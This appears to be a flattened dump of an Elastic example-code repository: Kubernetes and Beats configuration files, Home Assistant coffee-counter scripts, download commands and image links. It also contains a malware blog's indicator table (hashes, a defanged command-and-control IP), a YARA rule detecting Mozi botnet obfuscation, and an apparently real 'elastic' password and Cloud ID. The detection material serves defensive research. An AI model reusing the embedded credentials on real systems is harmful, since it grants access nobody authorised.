--------------------------------------------------------------------------------
1 | elastic:VFaTnqar2nDho2Wmb7rm9TG4
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTIC_CLOUD_ID:
--------------------------------------------------------------------------------
1 | k8s:ZXVyb3BlLXdlc3QxLmdjcC5jbG91ZC5lcy5pbyRhMzlmM2MwNWQ2Mjk0YzdiODQzZDA2YWU2NDJhZWM2MyQ5MzEwOTJjMTc5YWQ0YzQ5OThlN2U5MjAwYTg4NTIzZQ==
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/KIBANA_HOST:
--------------------------------------------------------------------------------
1 | "kibana-kibana.default.svc.cluster.local:5601"
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/scaling-discover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/beats-k8s-send-anywhere/scaling-discover.png


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/scaling-up.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/beats-k8s-send-anywhere/scaling-up.png


--------------------------------------------------------------------------------
/blog/README.MD:
--------------------------------------------------------------------------------
 1 | This folder is for holding example code being used in blogs (so people don't have to use their personal repo).
 2 | 
 3 | When creating a new folder, name it the URL of your blog post (just the slug/path, not the full URL). For example:
 4 |  
 5 | - **Blog URL:** `https://www.elastic.co/blog/elastic-machine-learning-finds-anomalies-fast`
 6 | - **GH Folder:** `elastic-machine-learning-finds-anomalies-fast`
 7 | 
 8 | Be sure to include a README.MD in your folder that includes:
 9 | - Full URL
10 | - Blog title
11 | - Blog summary/abstract
12 | 
13 | **Note:** If the URL gets changed before publish date, please update the folder name. If this isn't possible, please update the README.MD of your code so people know what the correct URL is.
14 | 


--------------------------------------------------------------------------------
/blog/climbing-the-pyramid-with-celestial-themed-malware/README.MD:
--------------------------------------------------------------------------------
 1 | # Climbing the Pyramid with Celestial-themed Malware
 2 | 
 3 | ## Abstract
 4 | The Deimos trojan (AKA Jupyter Infostealer, SolarMarker) is a malware tool first reported in 2020. It remains in active development and employs advanced defensive countermeasures to frustrate analysis. This post details the campaign TTPs through the malware indicators.
 5 | 
 6 | ## URL
 7 | 
 8 | ## Artifacts
 9 | Artifacts and code snippets from the blog post.
10 | 
11 | | Artifact | Description | Note |  
12 | | - | - | - |
13 | | f268491d2f7e9ab562a239ec56c4b38d669a7bd88181efb0bd89e450c68dd421 | Lure file | - |  
14 | | af1e952b5b02ca06497e2050bd1ce8d17b9793fdb791473bdae5d994056cb21f | Malware installer | - |  
15 | | d6e1c6a30356009c62bc2aa24f49674a7f492e5a34403344bfdd248656e20a54 | .NET DLL file | - |  
16 | | 216[.]230[.]232[.]134 | Command and control | - |  
17 | | [Deimos YARA Rule](windows_trojan_deimos.yar) | YARA rule to identify the Deimos DLL file. | - |  
18 | 


--------------------------------------------------------------------------------
/blog/mozin-about/mozi-obfuscation-technique.yara:
--------------------------------------------------------------------------------
 1 | rule Mozi_Obfuscation_Technique
 2 | {
 3 |   meta:
 4 |     author =  "Elastic Security, Lars Wallenborn (@larsborn)"
 5 |     description = "Detects obfuscation technique used by Mozi botnet."
 6 |   strings:
 7 |     $a = { 55 50 58 21   // "UPX!" magic
 8 |            [4]
 9 |            00 00 00 00   // p_info header fields zeroed out,
10 |            00 00 00 00   // breaking standard UPX unpacking
11 |            00 00 00 00 }
12 |   condition:
13 |     all of them
14 | }
15 | 


--------------------------------------------------------------------------------
/canvas/ama/images/existing-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/ama/images/existing-workpads.png


--------------------------------------------------------------------------------
/canvas/ama/images/no-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/ama/images/no-workpads.png


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/automations/elasticon-automations.yaml:
--------------------------------------------------------------------------------
 1 | - id: bulk_quad_detector
 2 |   alias: Bulk Quad Detector
 3 | #  hide_entity: true
 4 |   trigger:
 5 |     platform: event
 6 |     event_type: zwave.scene_activated
 7 |     # event_data:
 8 |     #   entity_id: zwave.quad1
 9 |   action:
10 |     - service: shell_command.quad_button_handler
11 |       data_template:
12 |         scene_id: "{{ trigger.event.data.scene_id }}"
13 |         scene_data: "{{ trigger.event.data.scene_data }}"
14 |         entity_id: "{{ trigger.event.data.entity_id }}"
15 |   
16 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/customize.yaml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/elasticon-home-assistant/customize.yaml


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/groups.yaml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/elasticon-home-assistant/groups.yaml


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/load-test.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | maxDelay=${1:-60}
 4 | 
 5 | function random
 6 | {
 7 |     local from=$1
 8 |     local to=$2
 9 | 
10 |     echo $(( ((RANDOM<<15)|RANDOM) % ($to - $from + 1) + $from))
11 | }
12 | 
13 | while [ 1 ]
14 | do
15 |     quad=$(random 1 4)
16 |     button=$(random 1 4)
17 |     delay=$(random 2 $maxDelay)
18 | 
19 |     echo "coffeePressHandler.sh  "zwave.quad${quad}" "$button" 0 delay=$delay"
20 |     ./coffeePressHandler.sh  "zwave.quad${quad}" "$button" 0
21 |     sleep $delay
22 | done
23 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/scripts.yaml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/elasticon-home-assistant/scripts.yaml


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/shell_commands/elasticon-shell_commands.yaml:
--------------------------------------------------------------------------------
1 | quad_button_handler: '/home/homeassistant/elasticon-home-assistant/coffeePressHandler.sh "{{ entity_id }}"  "{{ scene_id }}" "{{ scene_data }}"'
2 | 
3 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/zwscene.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <Scenes xmlns="http://code.google.com/p/open-zwave/" version="1" />
3 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/images/existing-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/images/existing-workpads.png


--------------------------------------------------------------------------------
/canvas/elasticoffee/images/no-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/images/no-workpads.png


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ECK-obs-infrastructure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/k8s-observability-with-eck/ECK-obs-infrastructure.png


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ELASTICSEARCH_HOSTS:
--------------------------------------------------------------------------------
1 | ["https://elasticsearch-sample-es.default.svc.cluster.local:9200"]
2 | 


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ELASTICSEARCH_PASSWORD:
--------------------------------------------------------------------------------
1 | abcdefghijjklmnopqrstuvw
2 | 


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ELASTICSEARCH_USERNAME:
--------------------------------------------------------------------------------
1 | elastic
2 | 


--------------------------------------------------------------------------------
/k8s-observability-with-eck/KIBANA_HOST:
--------------------------------------------------------------------------------
1 | "http://kibana-sample-kibana.default.svc.cluster.local:5601"
2 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/CLOUD_ID:
--------------------------------------------------------------------------------
1 | Put the cloud ID from cloud.elastic.co here. Make sure there is only one line in the file, containing only the cloud ID and no whitespace (replace this line).
2 | 
3 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/ELASTIC_PASSWORD:
--------------------------------------------------------------------------------
1 | Put the password for the elastic user here. Make sure there is only one line in the file, containing only the password and no whitespace (replace this line).
2 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/download.txt:
--------------------------------------------------------------------------------
 1 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/CLOUD_ID
 2 | 
 3 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/ELASTIC_PASSWORD
 4 | 
 5 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/README.md
 6 | 
 7 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/guestbook.yaml
 8 | 
 9 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/metricbeat-clusterrolebinding.yaml
10 | 
11 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/metricbeat-kube-state-and-prometheus-server.yaml
12 | 
13 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/metricbeat-prometheus-auto-discover.yaml
14 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/001-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/001-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/002-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/002-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/003-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/003-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/004-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/004-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/005-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/005-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/006-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/006-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/007-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/007-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/008-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/008-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/009-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/009-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/010-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/010-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/011-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/011-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/012-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/012-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/013-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/013-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/014-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/014-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/015-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/015-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/016-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/016-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/017-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/017-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/018-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/018-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/019-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/019-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/020-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/020-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/annotations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/annotations.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/kube-state-metrics.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/kube-state-metrics.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-autodiscover-exporters.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-autodiscover-exporters.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-prometheus-server.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-prometheus-server.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/prometheus-autodiscover-snippet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/prometheus-autodiscover-snippet.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/prometheus-federate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/prometheus-federate.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/prometheus-selfmon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/prometheus-selfmon.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/sidecar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/sidecar.png


--------------------------------------------------------------------------------